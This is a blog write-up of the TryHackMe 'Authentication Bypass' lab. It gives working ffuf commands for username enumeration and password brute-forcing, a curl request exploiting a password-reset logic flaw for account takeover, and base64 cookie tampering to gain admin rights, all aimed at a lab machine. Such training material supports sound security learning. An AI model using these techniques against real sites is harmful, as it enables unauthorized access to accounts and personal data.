Authentication Bypass Basics - THM

Learn how to defeat logins and other authentication mechanisms to allow you access to unauthorized areas.

we will learn about different ways website authentication methods can be bypassed, defeated or broken.

These vulnerabilities can be some of the most critical as it often ends in leaks of customers personal data.

As we know, work experience and training is a must nowadays in cyber security when it comes to entry-level jobs, check out this internship program that has everything for you, from shadowing a real penetration testing engagement to being a blue teamer.

Username Enumeration

Its always a good idea to make a list of valid usernames, if possible then emails also.

Here for demo purpose, I am using THM lab on Auth Bypass, so this blog can be take as a writeup but…

  • ** No answers are included for you, I want to give a fair chance***

Website error messages are great resources for collecting this information to build our list of valid usernames.

We have a form to create a new user account if we go to the Acme IT Support website (http://Machine IP/customers/signup) signup page.

If you try entering the username admin and fill in the other form fields with fake information, you’ll see we get the error An account with this username already exists.

We can use the existence of this error message to produce a list of valid usernames already signed up on the system by using the ffuf tool below.

The ffuf tool uses a list of commonly used usernames to check against for any matches.

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d “username=FUZZ&email=x&password=x&cpassword=x” -H “Content-Type: application/x-www-form-urlencoded” -u http://MACHINE_IP/customers/signup -mr “username already exists”

Let’s breakdown the above ffuf command for Username Enumeration in web applications

-w /usr/share/wordlists/SecLists/Usernames/Names/names.txt

Here we are selecting the Usernames file location that we are going to use in this website username fuzzing process.

-X POST

This specifies the request time, because we are brute-forcing a user signup form.

-d “username=FUZZ&email=x&password=x&cpassword=x”

This specifies the payload and Fuzzing location with regards to the Signup requirements.

Remember: x = your email & password

-H “Content-Type: application/x-www-form-urlencoded”

This Post request requires us to include this content-type header attached to it otherwise it will respond in false positives or may not work at all due to missing header.

-u http://MACHINE_IP/customers/signup

This Specifies the target url where our fuzzing will take place.

-mr “username already exists”

This is the most important part of this ffuf command, it can differ while attacking different applications depending how the web app throws an error. But here “username already exists” is the error we get when we provide an username that exists.

Now let’s put the command syntax together and make it work.

The fully working cmd that we have used.

Now you can answer the questions attached to the task!

Don’t forget to put the valid usernames in a .txt file so we can brute-force password.

Brute-forcing

A brute force attack is an automated process that tries a list of commonly used passwords against either a single username or, like in our case, a list of usernames.

When running this command, make sure the terminal is in the same directory as the valid_usernames.txt file.

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d “username=W1&password=W2” -H “Content-Type: application/x-www-form-urlencoded” -u http://MACHINE_IP/customers/login -fc 200

Note: In case we have more than 1 location to FUZZ, it’s better to assign it another value. In the above command we have W1 and W2 specified and later used in the process.

Let’s breakdown the above ffuf command to bruteforce the web app login page:

-w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2

This specifies the valid usernames list and password list that we want to use.

-X POST -d “username=W1&password=W2”

This is the payload with Post request and brute-force locations.

-H “Content-Type: application/x-www-form-urlencoded”

Here we have specified the Content-Type header.

-u http://MACHINE_IP/customers/login

This specifies our target url

-fc 200

This specifies the URL status code, usually we will get a 404, 403 etc status code, so using 200 will get us successful login prompts.

Let’s put all the command syntax and use it: Go to http://Machine IP/customers/login

Now answer the questions on your own.

Logic Flow

Sometimes authentication processes contain logic flaws.

A logic flaw is when the typical logical path of an application is either bypassed, circumvented or manipulated by a hacker.

Logic flaws can exist in any area of a website,

but we’re going to concentrate on examples relating to authentication in this instance.

Without getting into theory let move to the practical.

Create an account on Acme IT support

You will get an email rahul@acmeitsupport.thm

use the curl command to get a verification code: curl ‘http://10.10.65.198/customers/reset?email=robert@acmeitsupport.thm' -H ‘Content-Type: application/x-www-form-urlencoded’ -d ‘username=robert&email=rahul@customer.acmeitsupport.thm’

after submiting this u will get a email

Reset the password of Robert and collect the flag.

Hurry account takeover done!

Cookie Tampering

Examining and editing the cookies set by the web server during your online session can have multiple outcomes, such as unauthenticated access, access to another user’s account, or elevated privileges.

Cookies in Plain Text

The contents of some cookies can be in plain text, and it is obvious what they do. Take, for example, if these were the cookie set after a successful login:

Set-Cookie: logged_in=true; Max-Age=3600; Path=/
Set-Cookie: admin=false; Max-Age=3600; Path=/

We see one cookie (logged_in), which appears to control whether the user is currently logged in or not, and another (admin), which controls whether the visitor has admin privileges.

Using this logic, if we were to change the contents of the cookies and make a request we’ll be able to change our privileges.

First, we’ll start just by requesting the target page:

curl http://MACHINE_IP/cookie-test

Here Burpsuite can be used as a good alternative. Follow the steps in room to get your flag.

Hashing

Sometimes cookie values can look like a long string of random characters; these are called hashes which are an irreversible representation of the original text. Here are some examples that you may come across:
Original String

Hash Method & Their Output

md5
c4ca4238a0b923820dcc509a6f75849b
sha-256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
sha-512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

You can see from the above table that the hash output from the same input string can significantly differ depending on the hash method in use. Even though the hash is irreversible, the same output is produced every time, which is helpful for us as services such as https://crackstation.net/ keep databases of billions of hashes and their original strings.

Encoding

Encoding is similar to hashing in that it creates what would seem to be a random string of text, but in fact, the encoding is reversible.

So it begs the question, what is the point in encoding?

Encoding allows us to convert binary data into human-readable text that can be easily and safely transmitted over mediums that only support plain text ASCII characters.

Common encoding types are base32 which converts binary data to the characters A-Z and 2–7, and base64 which converts using the characters a-z, A-Z, 0–9,+, / and the equals sign for padding.

Take the below data as an example which is set by the web server upon logging in:

Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/

This string base64 decoded has the value of {“id”:1,”admin”: false} we can then encode this back to base64 encoded again but instead setting the admin value to true, which now gives us admin access.

Now you can answer the question on your own. To decode and encode base64 you can use: https://www.base64encode.org/

Thanks for following along, here is the room link:

https://tryhackme.com/room/authenticationbypass

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rahul Bhichher

Cyber Security Engineer at Quantiphi, AWS Community Builder, Volunteer at HIH Community